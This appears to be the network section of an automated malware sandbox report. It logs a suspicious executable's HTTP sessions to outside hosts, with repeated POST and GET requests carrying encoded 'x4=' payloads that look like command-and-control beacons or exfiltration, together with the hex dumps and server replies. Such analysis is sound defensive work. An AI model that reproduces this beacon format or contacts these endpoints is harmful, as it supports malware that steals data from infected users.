                                                                                                            Data Ascii: x4=s4z0josg0gQQ9U+QfZLeZMWBKr0BbMg0H5WJMuerZEz/0wiFV3/WUeGAmTfqwj2Tv+bBxWCT1Z58WYoGyXHULD3goTARgyDNXu7bcrezRggYNEWCg/hwlq8VA4byaGM7xzX0ZFCjjHIjP0QM/5NfFwMBwWRKEtlZtmK1XAqzWNH4TmPErzidxI26JT59C6f92w==
                                                                                                            Dec 12, 2024 10:20:50.939935923 CET462INHTTP/1.1 301 Moved Permanently
                                                                                                            Date: Thu, 12 Dec 2024 09:20:50 GMT
                                                                                                            Server: Apache/2
                                                                                                            Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 242
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 72 70 6f 6b 72 6f 76 73 6b 69 69 2e 70 72 6f 2f 37 6d 76 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.224917385.25.177.138801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:52.320725918 CET2472OUTPOST /7mvy/ HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.mrpokrovskii.pro
                                                                                                            Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 73 34 7a 30 6a 6f 73 67 30 67 51 51 6e 31 4f 51 65 2b 66 65 65 73 57 47 58 62 30 42 4d 63 67 6f 48 35 4b 4a 4d 76 4b 43 65 32 66 2f 7a 6e 75 46 53 55 58 57 53 65 47 41 71 44 66 51 39 44 32 5a 76 36 7a 72 78 58 79 74 31 66 4a 38 57 37 41 47 69 56 66 58 65 6a 33 6d 73 54 41 57 67 79 43 58 58 75 72 66 63 71 50 6b 52 67 6f 59 4e 32 2b 43 33 66 68 7a 71 4b 38 56 41 34 62 6d 61 47 4d 58 78 7a 4f 7a 5a 45 62 6b 6a 32 59 6a 4f 52 73 4d 7a 2b 5a 59 44 77 4d 4e 7a 57 52 59 55 64 67 44 6e 33 6d 35 56 78 53 44 4f 4e 62 6b 54 33 69 46 6c 44 69 48 31 36 71 49 43 56 56 71 4f 35 4f 68 73 63 50 30 4d 2f 6c 4f 41 42 49 44 4e 33 7a 6e 6e 6f 35 6b 4f 33 46 41 73 31 38 30 75 36 7a 58 38 73 5a 6d 39 71 63 4e 6b 73 72 5a 74 57 30 31 58 57 77 36 74 30 76 57 4e 6d 57 44 36 47 30 74 36 30 2b 71 2b 6a 42 36 64 75 73 39 6e 6d 75 74 59 47 57 4c 55 46 38 55 6e 4a 31 57 56 7a 75 46 38 33 30 75 6d 7a 53 79 50 68 41 4e 35 2b 61 79 6e 43 6d 36 66 37 7a 58 74 43 35 57 4e 32 74 49 74 49 79 4e 34 38 30 47 36 52 76 2f 38 41 4d [TRUNCATED]
                                                                                                            Data Ascii: x4=s4z0josg0gQQn1OQe+feesWGXb0BMcgoH5KJMvKCe2f/znuFSUXWSeGAqDfQ9D2Zv6zrxXyt1fJ8W7AGiVfXej3msTAWgyCXXurfcqPkRgoYN2+C3fhzqK8VA4bmaGMXxzOzZEbkj2YjORsMz+ZYDwMNzWRYUdgDn3m5VxSDONbkT3iFlDiH16qICVVqO5OhscP0M/lOABIDN3znno5kO3FAs180u6zX8sZm9qcNksrZtW01XWw6t0vWNmWD6G0t60+q+jB6dus9nmutYGWLUF8UnJ1WVzuF830umzSyPhAN5+aynCm6f7zXtC5WN2tItIyN480G6Rv/8AMk1zUXoZ1N8RzWgsG8zgU9R9+CKOoZOnUMSXqWtrfCtaIL501MV77Wtj6vc+5H+cmIVjz34T3/wZI0wV1FvlHpUyUgv6N9MzYxZ+999uiuntp+dSuX5wnpdXmwhdktEzZotbw+n+lyNU2S3Om8DYuA1LTzuWtnxKoEVvUyZjPIyujkkM3ITj0nH3snonPnvxkFXbk1SwHEuYBE+48huZCXnMfdZ9DuTqihynS9zOZO/n/U8jSI+WOoQ5rbLB5FFpwJDGnrWsfHq0Eq7SXv3DwwcISR8s/hjjmr2GbVrZ1DOauimzqQ76b43hK0aLjAQpMXCrJCNBHK033pFPPooMJWZURERlIjFFLAe8SduZsxOsvSot68XK1lwpCxdK/oRCPOlcJ53Fxk+AETi5SuH6kZXkBz3qHH+umdVti/XB33+rHle8XPNrC5ZGptnnUb0FLogiLjjimtuZU3qWoJgFX4dtkus+I6v0tWhuhYyTdtsLy5YfrC7W3vOUNF3a8uNIRhhu7OWEzHldow9tBjhRJjBFwG5E8g+86hNLyRwEfyVd/j/OjSWY+yGL2wNnIlWgjBiIhqO7S4qiAHbWlOVEccX2xOfAONC12zXXnxpmfmunAj/kXXGGXskl8aRlD/Uw7jH6ytXXndEnoBhjIQFtXwVWDtuwW7+Znln [TRUNCATED]
                                                                                                            Dec 12, 2024 10:20:52.440634012 CET1770OUTData Raw: 44 71 79 71 34 53 32 72 78 56 6f 2f 32 51 73 63 45 67 77 4c 38 4c 67 38 4c 43 41 34 5a 47 70 6f 75 68 64 71 6d 2f 4f 48 67 69 2f 70 34 50 35 6f 41 69 65 69 43 58 50 72 7a 2b 4d 43 78 79 51 30 7a 67 51 78 7a 4c 4b 37 2f 79 4d 2f 77 6d 74 6b 39 4a
                                                                                                            Data Ascii: Dqyq4S2rxVo/2QscEgwL8Lg8LCA4ZGpouhdqm/OHgi/p4P5oAieiCXPrz+MCxyQ0zgQxzLK7/yM/wmtk9JlPzhVZyeisKSDAJiFfZYXVE/sOsFv/KBPLGacobS+qz7gDAWDYHAj+TnZTZqIM2C2oW1bTNDBuwsqHa9dhEnSUA6Rzric1Hpb5CEt8i6/xVAVDjAB/RRbpZiZHRv3ouePRtIXeGnR8owFCSfjLwMYH/p8vEP1G2g+
                                                                                                            Dec 12, 2024 10:20:53.691487074 CET462INHTTP/1.1 301 Moved Permanently
                                                                                                            Date: Thu, 12 Dec 2024 09:20:53 GMT
                                                                                                            Server: Apache/2
                                                                                                            Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                                            Content-Length: 242
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 72 70 6f 6b 72 6f 76 73 6b 69 69 2e 70 72 6f 2f 37 6d 76 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.224917485.25.177.138801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:20:54.975557089 CET545OUTGET /7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&e2E=wRQ8oHXx HTTP/1.1
                                                                                                            Host: www.mrpokrovskii.pro
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Dec 12, 2024 10:20:56.247915983 CET748INHTTP/1.1 301 Moved Permanently
                                                                                                            Date: Thu, 12 Dec 2024 09:20:56 GMT
                                                                                                            Server: Apache/2
                                                                                                            Location: https://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&e2E=wRQ8oHXx
                                                                                                            Content-Length: 387
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 72 70 6f 6b 72 6f 76 73 6b 69 69 2e 70 72 6f 2f 37 6d 76 79 2f 3f 78 34 3d 68 36 62 55 67 59 4d 35 6f 51 49 6f 6d 33 53 45 4c 65 43 68 56 4f 57 68 49 39 56 57 50 5a 67 33 42 4b 69 43 48 2b 53 61 5a 45 71 50 7a 51 6d 37 64 45 47 63 53 76 61 42 6a 53 7a 34 34 54 6e 2b 67 4c 7a 6a 67 33 4b 6b 6f 75 5a 66 51 72 30 4b 6c 58 65 43 51 44 37 42 6f 68 51 72 6a 6a 4c 6f 52 74 33 54 55 76 6a 7a 48 53 55 4c 4a 44 62 79 6e 75 56 6d 6f 72 73 67 57 63 4b [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/?x4=h6bUgYM5oQIom3SELeChVOWhI9VWPZg3BKiCH+SaZEqPzQm7dEGcSvaBjSz44Tn+gLzjg3KkouZfQr0KlXeCQD7BohQrjjLoRt3TUvjzHSULJDbynuVmorsgWcKo&amp;e2E=wRQ8oHXx">here</a>.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.2249175173.236.199.97801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:21:29.188191891 CET2472OUTPOST /zu0o/ HTTP/1.1
                                                                                                            Host: www.kvsj.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.kvsj.net
                                                                                                            Referer: http://www.kvsj.net/zu0o/
                                                                                                            Content-Length: 2159
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 57 38 37 59 65 42 75 63 47 78 77 4e 45 66 59 6f 35 50 65 73 74 50 32 33 48 6f 63 64 75 42 35 62 66 4e 77 2f 6e 61 73 75 78 37 48 47 4f 36 46 54 52 66 6e 69 35 72 44 31 69 74 35 63 38 43 41 31 43 75 69 56 4f 4a 4f 77 4d 54 79 48 5a 53 38 41 62 4b 4a 61 4e 39 51 62 5a 6c 36 45 33 30 6a 6c 55 61 78 4d 79 68 62 58 4e 49 41 7a 49 6f 4f 64 2b 75 38 41 2f 71 6e 31 69 47 73 70 72 41 69 48 39 75 47 54 79 36 6a 45 61 53 49 54 55 4e 76 43 49 61 48 4a 57 6b 64 76 43 72 68 4c 67 33 44 69 75 5a 56 6f 38 4a 67 4e 64 78 35 43 4e 48 49 39 2f 32 52 6f 58 47 33 4f 4c 55 32 38 76 31 50 48 61 44 67 4f 41 54 71 59 45 78 6b 51 69 4b 77 4a 6b 4d 49 70 37 6c 55 75 44 56 30 30 64 78 67 54 42 59 50 52 5a 39 65 6d 66 38 72 64 78 59 37 6a 46 74 35 41 4c 44 48 77 37 6a 71 6b 39 70 44 45 55 77 50 6e 62 55 34 64 6b 2f 51 49 50 4c 54 72 39 6c 67 5a 71 36 50 63 73 78 37 45 59 4b 37 58 55 77 4d 57 65 72 47 4a 52 73 56 51 58 4b 34 4d 51 76 73 39 77 39 4a 64 52 52 49 66 72 6d 6d 62 7a 73 6e 36 38 49 79 47 4a 44 41 4a 32 4c 65 [TRUNCATED]
                                                                                                            Data Ascii: x4=W87YeBucGxwNEfYo5PestP23HocduB5bfNw/nasux7HGO6FTRfni5rD1it5c8CA1CuiVOJOwMTyHZS8AbKJaN9QbZl6E30jlUaxMyhbXNIAzIoOd+u8A/qn1iGsprAiH9uGTy6jEaSITUNvCIaHJWkdvCrhLg3DiuZVo8JgNdx5CNHI9/2RoXG3OLU28v1PHaDgOATqYExkQiKwJkMIp7lUuDV00dxgTBYPRZ9emf8rdxY7jFt5ALDHw7jqk9pDEUwPnbU4dk/QIPLTr9lgZq6Pcsx7EYK7XUwMWerGJRsVQXK4MQvs9w9JdRRIfrmmbzsn68IyGJDAJ2LeRHstkz25dky0ljpTMCMchr2Wbxnuz0RUDE92BVJdFCbMogj8dk6mz2dQiZwr9CtEHg8gwA6b7OuMV0T+u+Uj31khtN99qF2bJOahcyv1M8PwwXlpIvWVFc5c7oU8H9WrZ5DQygLpK/vzJ1oxna3CsMV4SRKSrdeBfK/0M41BdfCEhAcmb/hY0A3iuFAMwGYhTagFe+rLf/WVvYengEFYPeQmOVU4lvFjn3ebB1h8JwESDfwO+kke+018qzuhYdMKQCNZm+Q2Sr8KPuLRMaj65j8xKtrg/XZctjhP5Rwie/cFQjdS2Eli3zKtjGK4JPH9Ne5LaFvdyDq4EQzMP1OzlU82bKN1VFh7ozYE5jJ2LZYGyTW23rejjy1Lf5xnPI7jjuMn/k6mXgIQRYfccltVikf/ofkI5ahzQXfK1jfbtyFhe3aZDrK1e0RiRIUiw4brERF/+b40qrNU3AAZlyhVIRj05TL9U2fA/N/hbdqWmTYrGlumSpHxegnAZP2dvjR+uq+VqUmGCwfaJCLquhA69jLc7EI5RFN4Bj/OOBCWaHUghB3BnD/t7uD6UNsowXUwtUsWNHATAitjNyXXokLX2bHUDgIKETBVkc/vqRdQ7pOfp0sGzPvq24fMBpQwClSoV7CD5tsYfGkFGYPKzzwbcBi9WnIQOd7yii [TRUNCATED]
                                                                                                            Dec 12, 2024 10:21:29.308577061 CET282OUTData Raw: 71 6c 54 69 52 74 4e 68 50 4a 6d 6d 63 4e 6b 52 30 4a 30 4c 68 43 62 4c 33 38 54 36 61 5a 59 64 5a 56 72 4a 45 46 6e 41 51 46 57 41 46 4c 56 52 41 5a 55 43 55 42 47 51 41 4c 4e 55 56 6d 2b 4b 56 64 57 41 5a 75 34 67 74 37 32 73 41 49 4e 49 75 62
                                                                                                            Data Ascii: qlTiRtNhPJmmcNkR0J0LhCbL38T6aZYdZVrJEFnAQFWAFLVRAZUCUBGQALNUVm+KVdWAZu4gt72sAINIubJhbuDbvhmYNFjNIOKIxA6vSjZWw+YA4OSh/VNr0uQREN08javtJ3p0joB3fSkumghhnyD7w7jzJWsXaB6Y/j9jfF8bMXZN1YSyqqMLj7VjyiybTBoYvdPdnmFeGYrWNESYdfDG0b7BLgn8dUaJ74B8cEgw2nvWuSD
                                                                                                            Dec 12, 2024 10:21:30.290648937 CET479INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:30 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 315
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.2249176173.236.199.97801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:21:31.849853039 CET793OUTPOST /zu0o/ HTTP/1.1
                                                                                                            Host: www.kvsj.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.kvsj.net
                                                                                                            Referer: http://www.kvsj.net/zu0o/
                                                                                                            Content-Length: 199
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 57 38 37 59 65 42 75 63 47 78 77 4e 45 63 41 6f 37 61 71 73 73 76 32 33 4b 49 63 64 68 68 35 64 66 4e 73 33 6e 59 41 45 78 4e 6a 47 4f 76 35 54 52 71 37 69 34 72 44 32 36 64 35 51 6a 53 41 61 43 75 6a 38 4f 49 79 77 4d 54 57 48 59 78 45 41 4b 65 64 5a 47 74 51 5a 52 46 36 5a 33 30 76 6f 55 61 30 52 79 68 7a 58 4e 4a 38 7a 4a 6f 2b 64 31 74 55 41 70 71 6d 66 6b 47 73 36 72 41 76 54 39 75 57 68 79 35 6e 45 64 68 4d 54 55 65 72 43 43 72 48 4a 50 55 64 73 46 72 67 63 68 30 75 4e 6b 70 42 2b 38 76 59 69 63 44 30 36 43 47 63 75 6c 67 64 39 64 6d 48 59 42 67 6a 52 68 57 75 77 48 67 3d 3d
                                                                                                            Data Ascii: x4=W87YeBucGxwNEcAo7aqssv23KIcdhh5dfNs3nYAExNjGOv5TRq7i4rD26d5QjSAaCuj8OIywMTWHYxEAKedZGtQZRF6Z30voUa0RyhzXNJ8zJo+d1tUApqmfkGs6rAvT9uWhy5nEdhMTUerCCrHJPUdsFrgch0uNkpB+8vYicD06CGculgd9dmHYBgjRhWuwHg==
                                                                                                            Dec 12, 2024 10:21:32.950170994 CET479INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 09:21:32 GMT
                                                                                                            Server: Apache
                                                                                                            Content-Length: 315
                                                                                                            Connection: close
                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.2249177173.236.199.97801020C:\Program Files (x86)\MccdFxiMuIbxHJlDJsGlznbDEMHvijPJQJgMCqspgvs\mrNbohrgjTw.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 10:21:34.502125978 CET2472OUTPOST /zu0o/ HTTP/1.1
                                                                                                            Host: www.kvsj.net
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                            Accept-Language: en-US
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Origin: http://www.kvsj.net
                                                                                                            Referer: http://www.kvsj.net/zu0o/
                                                                                                            Content-Length: 3623
                                                                                                            Connection: close
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Cache-Control: max-age=0
                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                                            Data Raw: 78 34 3d 57 38 37 59 65 42 75 63 47 78 77 4e 47 2f 6f 6f 30 5a 79 73 39 66 33 46 50 49 63 64 75 42 35 5a 66 4e 77 33 6e 61 73 75 78 2f 76 47 4f 34 39 54 66 76 6e 69 72 62 44 32 38 64 35 63 38 43 41 32 43 75 6e 65 4f 4a 43 67 4d 56 32 48 5a 58 63 41 62 4e 6c 61 49 39 51 62 47 56 36 61 33 30 76 48 55 63 55 56 79 68 6d 79 4e 4b 4d 7a 4a 64 4b 64 7a 64 55 44 6c 4b 6d 66 6b 47 73 49 72 41 75 79 39 75 4f 44 79 37 47 42 61 55 41 54 58 39 76 43 4f 71 48 4f 65 45 63 45 50 4c 68 52 67 33 50 62 75 5a 56 73 38 4a 63 6e 64 78 46 43 66 48 55 39 2f 78 6c 72 4c 6d 33 4e 50 55 32 38 69 56 50 42 61 44 67 53 41 54 71 59 45 79 67 51 6a 61 77 4a 6b 4a 6f 6f 6c 56 55 75 4f 31 31 30 5a 78 73 74 42 62 79 79 5a 2b 58 54 65 4b 4c 64 77 64 50 6a 42 64 35 41 4e 7a 47 31 37 6a 71 70 32 4a 44 59 55 30 6a 76 62 58 52 41 6b 2f 51 49 50 4b 7a 72 33 54 30 5a 6b 36 50 63 7a 42 36 6a 58 71 37 55 55 77 49 6b 65 6f 61 4a 52 70 35 51 56 34 67 4d 59 4b 59 2b 36 74 4a 4a 56 52 49 64 36 32 6e 66 7a 73 72 51 38 49 72 72 4a 43 77 4a 32 4a 6d [TRUNCATED]
